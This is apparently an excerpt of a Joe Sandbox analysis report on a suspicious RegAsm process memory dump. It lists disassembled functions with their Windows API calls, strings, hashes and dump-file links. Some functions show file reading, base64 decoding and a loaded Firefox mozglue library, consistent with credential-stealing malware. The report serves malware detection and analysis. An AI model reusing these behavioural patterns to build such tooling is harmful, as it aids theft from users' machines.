Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 004121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041595C,?), ref: 004121F2

StrStrA.SHLWAPI(00000000), ref: 0041596A
GlobalFree.KERNEL32(?), ref: 00415A8C

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

lstrcatA.KERNEL32(?,00000000), ref: 00415A18
StrCmpCA.SHLWAPI(?,00436645), ref: 00415A35
lstrcatA.KERNEL32(?,?), ref: 00415A54
lstrcatA.KERNEL32(?,00436A8C), ref: 00415A65

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 4109952398-0
Opcode ID: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
Instruction ID: 4905153569d8748fa83d0ede9c9d82dcbc9816826170d9825a589ea8a61000d7
Opcode Fuzzy Hash: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
Instruction Fuzzy Hash: F8713DB1D4022D9FDF20DF61DC45BCA77BAAF88314F0405E6E908A3250EA369FA58F55

Function 00428B14 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00428B2D

Part of subcall function 00424074: Sleep.KERNEL32(00000000,?), ref: 0042409C

__calloc_crt.LIBCMT ref: 00428B51
_free.LIBCMT ref: 00428B5F
__calloc_crt.LIBCMT ref: 00428B6D
_free.LIBCMT ref: 00428B7D
_free.LIBCMT ref: 00428B83
__copytlocinfo_nolock.LIBCMT ref: 00428B92
__setlocale_nolock.LIBCMT ref: 00428B9F
_free.LIBCMT ref: 00428BB8
__setmbcp_nolock.LIBCMT ref: 00428BCA
_free.LIBCMT ref: 00428BD8
_free.LIBCMT ref: 00428BEC

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction ID: 316f7d86b509052675ed64499f597221969422cd52b172cd7ffbd25416df4cfd
Opcode Fuzzy Hash: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction Fuzzy Hash: 392126B1705621BADB217F26F802D4FBBE0DF91758BA0842FF48446261DF39A840C65D

Function 004015E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
GetLastError.KERNEL32 ref: 0040160C
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
GetWindowContextHelpId.USER32(00000000), ref: 0040161B
GetWindowLongW.USER32(00000000,00000000), ref: 00401623
RegisterClassW.USER32(00000000), ref: 0040162A
IsWindowVisible.USER32(00000000), ref: 00401631
ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
HeapFree.KERNEL32(00000000), ref: 0040165D

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE

Function 6C058ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C01EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C01EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C05B392,?,?,00000001), ref: 6C0591F4

Part of subcall function 6C04CBE8: GetCurrentProcess.KERNEL32(?,6C0131A7), ref: 6C04CBF1
Part of subcall function 6C04CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0131A7), ref: 6C04CBFA

Strings

marker-chart, xrefs: 6C05905E
timeline-memory, xrefs: 6C059088
data, xrefs: 6C0590E8
marker-table, xrefs: 6C05906C
timeline-overview, xrefs: 6C05907A
stack-chart, xrefs: 6C0590B2
name, xrefs: 6C058F16
timeline-fileio, xrefs: 6C0590A4
timeline-ipc, xrefs: 6C059096

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: d0305f79860581aaf496d45ca64b2c9cc9c40c6856b73703124f0a63b72c1c89
Instruction ID: 1f279b3f0888c83b95a93bd4b8ff7b0d5028ec78070fef8f0c55735433f803b7
Opcode Fuzzy Hash: d0305f79860581aaf496d45ca64b2c9cc9c40c6856b73703124f0a63b72c1c89
Instruction Fuzzy Hash: 7CB1B1B0A012099BDF04CF98C591BAEBBF6FF89318F504529D506ABF80D731AA55CBD0

Function 6C03C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C03C5A3
WideCharToMultiByte.KERNEL32 ref: 6C03C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C03C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C03CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C03CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C03CAA5

Strings

0, xrefs: 6C03D30A
(null), xrefs: 6C03C596

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: aab210c07f3d85966d908b9d4ed4873d246c9aa6d964fe827202d0abf0b738ef
Instruction ID: d326ebbdf486494d1a3914c7d3c050dff3d63cbd27b4994624d102d583c9b66e
Opcode Fuzzy Hash: aab210c07f3d85966d908b9d4ed4873d246c9aa6d964fe827202d0abf0b738ef
Instruction Fuzzy Hash: BEA19D306093629FDB10DF29C548B5EBBE5BF8A748F049A1DE88AD7641DB31DC05CB92

Function 6C03C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C03C784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C03C801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C03C83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C03C891

Strings

nan, xrefs: 6C03C7A8
inf, xrefs: 6C03C78F
INF, xrefs: 6C03C794
NAN, xrefs: 6C03C7AD

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: 0e1786a34889e2f6ab4c1a5c32139c8a9505d57468c5bcf96d72989bd63475d6
Instruction ID: 61e6fd15e6aefe09927e3352cc6b4b4e1045ac0311323b1c4097281e987cbae3
Opcode Fuzzy Hash: 0e1786a34889e2f6ab4c1a5c32139c8a9505d57468c5bcf96d72989bd63475d6
Instruction Fuzzy Hash: 03518470A087518BDB04DF6CC58179EFBF0BF8A308F409A1DE9D997651EB70D9858B42

Function 6C013480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C013492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C0134A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C0134EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C01350E
__Init_thread_footer.LIBCMT ref: 6C013522
__aulldiv.LIBCMT ref: 6C013552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C01357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C013592

Part of subcall function 6C04AB89: EnterCriticalSection.KERNEL32(6C09E370,?,?,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284), ref: 6C04AB94
Part of subcall function 6C04AB89: LeaveCriticalSection.KERNEL32(6C09E370,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04ABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C013508
kernel32.dll, xrefs: 6C0134EA

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 505bdc424cfda5df0ffd93e1f1e5da763b812d1cad2f308063df9b17573c54ad
Instruction ID: 44a34bfc42125cce03acb6ad86cfc7c52c48f97a8f2bf89297d107f8d5f4ef52
Opcode Fuzzy Hash: 505bdc424cfda5df0ffd93e1f1e5da763b812d1cad2f308063df9b17573c54ad
Instruction Fuzzy Hash: C9317071B04209DBDF14DFB5C848BAEB7FDFB49715F105029E685A3A50EE70A904CB60

Function 0042660D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00426634
_free.LIBCMT ref: 00426642
_free.LIBCMT ref: 0042664D
_free.LIBCMT ref: 00426621

Part of subcall function 0041D93B: HeapFree.KERNEL32(00000000,00000000,?,0041D18F,00000000,0043B6F4,0041D1D6,0040EEBE,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4), ref: 0041D951
Part of subcall function 0041D93B: GetLastError.KERNEL32(?,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4,?,?,?), ref: 0041D963

___free_lc_time.LIBCMT ref: 0042666B
_free.LIBCMT ref: 00426676
_free.LIBCMT ref: 0042669B
_free.LIBCMT ref: 004266B2
_free.LIBCMT ref: 004266C1

Strings

xLC, xrefs: 0042665B

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID: xLC
API String ID: 3704779436-381350105
Opcode ID: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction ID: fdfe39178027f3e5e6c57af64549801535ecf2e9aa55874642047572a4db4e51
Opcode Fuzzy Hash: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction Fuzzy Hash: 421194F2A10311ABDF206F76E985B9BB3A5EB01308F95093FE14897251CB3C9C91CA1C

Function 6C014480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C054843,?), ref: 6C0145F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C054843,?), ref: 6C01468A
free.MOZGLUE(?,?,?,?,?,?,6C054843,?), ref: 6C0146C9
free.MOZGLUE(?), ref: 6C0146EF
free.MOZGLUE(?), ref: 6C014712
free.MOZGLUE(?), ref: 6C014735
free.MOZGLUE(?), ref: 6C014758
free.MOZGLUE(?), ref: 6C01477B
free.MOZGLUE(?), ref: 6C01479E

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 9c5aaa022971f382380928f8dd4c93b1038f144cf863b831392abb79e3127e47
Instruction ID: 410a1188e8f2fd1e5ae58980194937ac3a2126d629dff042eff90e2decf70076
Opcode Fuzzy Hash: 9c5aaa022971f382380928f8dd4c93b1038f144cf863b831392abb79e3127e47
Instruction Fuzzy Hash: ADB1F371A081119FDB188FFCD89076DB6E6AF4632CF584629E416DFFE2D73099408B91

Function 6C07AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C07AC52
CreateFileMappingW.KERNEL32 ref: 6C07AC7D
GetSystemInfo.KERNEL32 ref: 6C07AC98
MapViewOfFile.KERNEL32 ref: 6C07ACB0
GetSystemInfo.KERNEL32 ref: 6C07ACCD
MapViewOfFile.KERNEL32 ref: 6C07AD05
UnmapViewOfFile.KERNEL32 ref: 6C07AD1C
CloseHandle.KERNEL32 ref: 6C07AD28
UnmapViewOfFile.KERNEL32 ref: 6C07AD37
CloseHandle.KERNEL32 ref: 6C07AD43
CloseHandle.KERNEL32 ref: 6C07AD67

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 616b33564f3fd30b5ab8e076cd1b94b9a1710c50122ff437d12b2532b2a0045e
Instruction ID: 02091fbe8f5d7acec8fc16dd2c1876dbc2976a30fe619a68e948d9d7557a06b0
Opcode Fuzzy Hash: 616b33564f3fd30b5ab8e076cd1b94b9a1710c50122ff437d12b2532b2a0045e
Instruction Fuzzy Hash: 76315FB1A047048FDB10AF7CD64836EBBF4BF85315F11992DE99697211EF709848CB92

Function 0041B991 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,038F2528), ref: 0041B9C5
GetFileSize.KERNEL32(?,00000000), ref: 0041BA3E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BA5A
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BA6E
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BA77
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BA87
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BAA5
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BAB5

Strings

, xrefs: 0041BA11

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction ID: 2f96ef8e8c352da0c6fd23b8bc0b50d76e073618b9a0ce70252d9e73764e8c17
Opcode Fuzzy Hash: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction Fuzzy Hash: 4A51F3B1D0021CAFDB28DF99DC85AEEBBB9EF04344F10442AE511E6260D7789D85CF94

Function 6C029620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C029675
__Init_thread_footer.LIBCMT ref: 6C029697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0296E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C029707
__Init_thread_footer.LIBCMT ref: 6C02971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C029773

Part of subcall function 6C04AB89: EnterCriticalSection.KERNEL32(6C09E370,?,?,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284), ref: 6C04AB94
Part of subcall function 6C04AB89: LeaveCriticalSection.KERNEL32(6C09E370,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0297B7
FreeLibrary.KERNEL32 ref: 6C0297D0
FreeLibrary.KERNEL32 ref: 6C0297EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C029824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C029670
ntdll.dll, xrefs: 6C0296E3
MapViewOfFileNuma2, xrefs: 6C0297B1
NtMapViewOfSection, xrefs: 6C029701

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 9418e95d782d0040cf0dbf4c1a7f9c533b0775e99d1edc473a234240f77a9432
Instruction ID: e687d94ea6686758cbd9668ab7575057eff83953508dc55c49009901677aec37
Opcode Fuzzy Hash: 9418e95d782d0040cf0dbf4c1a7f9c533b0775e99d1edc473a234240f77a9432
Instruction Fuzzy Hash: FA418F757042059BDF00CFA5D884B9AB7F8FB49328F109528FD5997740DB34AA14CBA1

Function 6C075FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C076009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C076024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C01EE51,?), ref: 6C076046
OutputDebugStringA.KERNEL32(?,6C01EE51,?), ref: 6C076061
